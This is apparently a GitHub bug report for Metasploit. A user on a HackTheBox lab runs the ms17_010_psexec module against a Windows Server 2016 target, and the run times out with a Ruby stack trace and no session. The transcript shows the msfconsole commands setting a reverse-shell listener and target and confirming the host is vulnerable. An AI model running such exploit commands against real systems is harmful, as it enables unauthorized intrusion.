metasploit-framework
metasploit-framework copied to clipboard
Error on (windows/smb/ms17_010_psexec) module resulting to timeout execution
Hi i was playing Metasploit Framework module on hackthebox
Framework Version: 6.4.12-dev
output
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost tun0
lhost => 10.10.15.178
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 10.129.137.152
rhosts => 10.129.137.152
msf6 exploit(windows/smb/ms17_010_psexec) > check
[*] 10.129.137.152:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.137.152:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard 14393 x64 (64-bit)
[*] 10.129.137.152:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.137.152:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.15.178:4444
[*] 10.129.137.152:445 - Target OS: Windows Server 2016 Standard 14393
[-] 10.129.137.152:445 - Timeout::Error
[-] 10.129.137.152:445 - execution expired
[-] 10.129.137.152:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/timeout-0.4.1/lib/timeout.rb:43:in `rescue in handle_timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/timeout-0.4.1/lib/timeout.rb:40:in `handle_timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/timeout-0.4.1/lib/timeout.rb:195:in `timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.32/lib/rex/io/stream.rb:179:in `timed_read'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:65:in `smb_recv'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb:889:in `recv_transaction_data'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb:866:in `leak_frag_size'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb:351:in `exploit_matched_pairs'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb:44:in `eternal_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:128:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:188:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:35:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) >